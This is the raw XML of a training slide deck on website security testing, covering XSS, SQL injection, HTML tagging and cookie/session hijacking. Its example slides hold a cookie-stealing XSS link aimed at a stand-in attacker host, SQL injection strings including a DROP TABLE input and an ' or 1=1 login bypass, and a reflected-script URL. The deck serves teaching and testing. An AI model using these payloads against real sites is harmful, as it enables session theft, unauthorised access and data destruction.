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58" r:id="rId5"/>
    <p:sldId id="259" r:id="rId6"/>
    <p:sldId id="260" r:id="rId7"/>
    <p:sldId id="261" r:id="rId8"/>
    <p:sldId id="262" r:id="rId9"/>
    <p:sldId id="263" r:id="rId10"/>
    <p:sldId id="264" r:id="rId11"/>
    <p:sldId id="265" r:id="rId12"/>
    <p:sldId id="273" r:id="rId13"/>
    <p:sldId id="266" r:id="rId14"/>
    <p:sldId id="267" r:id="rId15"/>
    <p:sldId id="268" r:id="rId16"/>
    <p:sldId id="276" r:id="rId17"/>
    <p:sldId id="274" r:id="rId18"/>
    <p:sldId id="272" r:id="rId19"/>
    <p:sldId id="269" r:id="rId20"/>
    <p:sldId id="270"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3AE0678-50A6-4135-8890-AEED0997CC8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8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05E84-A281-40F9-BB28-AB49D758163D}"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381586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287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420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3547856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059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153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501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07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39157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105E84-A281-40F9-BB28-AB49D758163D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12/8/2015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E0678-50A6-4135-8890-AEED0997CC8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59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105E84-A281-40F9-BB28-AB49D758163D}"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207400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105E84-A281-40F9-BB28-AB49D758163D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12/8/2015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E0678-50A6-4135-8890-AEED0997CC8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96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105E84-A281-40F9-BB28-AB49D758163D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12/8/2015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E0678-50A6-4135-8890-AEED0997CC8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78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05E84-A281-40F9-BB28-AB49D758163D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12/8/2015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1544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05E84-A281-40F9-BB28-AB49D758163D}"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E0678-50A6-4135-8890-AEED0997CC8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959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105E84-A281-40F9-BB28-AB49D758163D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12/8/2015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E0678-50A6-4135-8890-AEED0997CC89}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6683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105E84-A281-40F9-BB28-AB49D758163D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12/8/2015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AE0678-50A6-4135-8890-AEED0997CC89}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3831495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oogle.com.pk/about/appsecurity/learning/xs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odebashing.com/sql_dem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roductionconduit.technologyally.info/login.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102" y="1615859"/>
            <a:ext cx="7052966" cy="1770806"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sites </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security Testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By M Farooq Rasheed</a:t>
            </a:r>
            <a:endParaRPr lang="ar-SA" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="158721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for Persistent XSS Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are two types of users: “Admin” and “Normal” user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When “Admin” log-in, he can see the list of usernames. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When “Normal” users log-in, they can only update their display name.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>onclick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=\"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=\'http://not-real-xssattackexamples.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xss.php?c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=\'+escape\(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\)\;\"&gt;My Name&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="150487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above </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>entered by the attacker will be stored in the database </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now, when the admin log-in to the system, he will see a link named “My Name” along with other usernames. When admin clicks the link, it will send the cookie which has the session ID, to the attacker’s site. Now the attacker can post a request by using that session ID to the web server, and he can act like “Admin” until the session is expired.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="170396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For XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.google.com.pk/about/appsecurity/learning/xss/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1488442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pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>SQL injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is a type of web application security vulnerability in which an attacker is able to submit a database SQL command that is executed by a web application, exposing the back-end database.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="156315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SQL Injection works</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In order to run malicious SQL queries against a database server, an attacker must first find an input within the web application that is included inside of an SQL query.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In order for an SQL injection attack to take place, the vulnerable website needs to directly include user input within an SQL statement. An attacker can then insert a payload that will be included as part of the SQL query and run against the database server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="47383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983" y="982132"/>
            <a:ext cx="10872591" cy="4893207"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3813377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SQL Injection Queries</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enter 105; DROP TABLE &lt;Name&gt; in input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>fields</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>or 1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)# where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> break your query string /parameters and 1=1 means condition become true .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>   SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>* FROM Customers WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>User=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>farooq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>://example.com/login.asp? username=' or 1=1 /*&amp;password=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="226582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a:t>For SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.codebashing.com/sql_demo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21600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Cookie/Session </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>hijacking</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N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>personal or sensitive data is stored in the cookie.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>sensitive data stored in cookie make sure that data stored in encrypted format.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Delete cookie: Allow site to write the cookies and then close all browsers and manually delete all cookies for web site under test. Access the web pages and check the behavior of the pages.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>fter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>login and logout with multiple users, it should not store personal or sensitive data in the cookie. If previous user ID is 100 then make it 101 and press enter. The proper access message should be displayed to user and user should not be able to see other users account.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Verify Cookie functionality on multiple browsers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="97592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Security Risk</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4504" y="2054269"/>
            <a:ext cx="10459233" cy="3821070"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3194284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What is Security Testing?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>How to Identify Entry points of Website?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Elements Of Security testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Demo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="86341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For HTML tagging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>productionconduit.technologyally.info/login.aspx</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93113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9366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Security Testing?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web application security testing is the process of testing, analyzing and reporting on the security level and/or posture of a Web application.</a:t>
            </a:r>
            <a:endParaRPr lang="ar-SA" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The key objective behind Web application security testing is to identify any vulnerabilities or threats that can jeopardize the security or integrity of the Web application.</a:t>
            </a:r>
            <a:endParaRPr lang="ar-SA" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="123884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Zero</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Needs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to identify all parameters used in a GET request (i.e., URL), in particular the query string (usually after a ? mark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>     http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>://example.com/login.asp?user=abc</a:t>
            </a:r>
            <a:endParaRPr lang="ar-SA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Need </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to identify all the parameters of the query string. These usually are in a pair format, such as foo=bar. Also note that many parameters can be in one query string such as separated by a &amp;, ~, :, or any other special character or encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>      http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>www.example.com/login.asp?name=tester&amp;email=tester@test1.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Identify </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>where new cookies are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (Set-Cookie header), modified, or added to.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="361330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Security Testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Site Scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTML tagging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cookie / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session hijacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="297721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Scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS is very similar to SQL-Injection. In SQL-Injection we exploited the vulnerability by injecting SQL Queries as user inputs. In XSS, we inject code (basically client side scripting) to the remote server.</a:t>
            </a:r>
            <a:endParaRPr lang="ar-SA" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3336084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XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS attacks are broadly classified into 2 types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Non-Persistent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Persistent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="360388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Non-Persistent XSS Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Non-Persistent attack, requires a user to visit the specially crafted link by the attacker. When the user visit the link, the crafted code will get executed by the user’s browser. Let us understand this attack better with an example.</a:t>
            </a:r>
            <a:endParaRPr lang="ar-SA" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>bc.com?name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=guest&lt;script&gt;alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>('attacked')&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>bc.com?name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
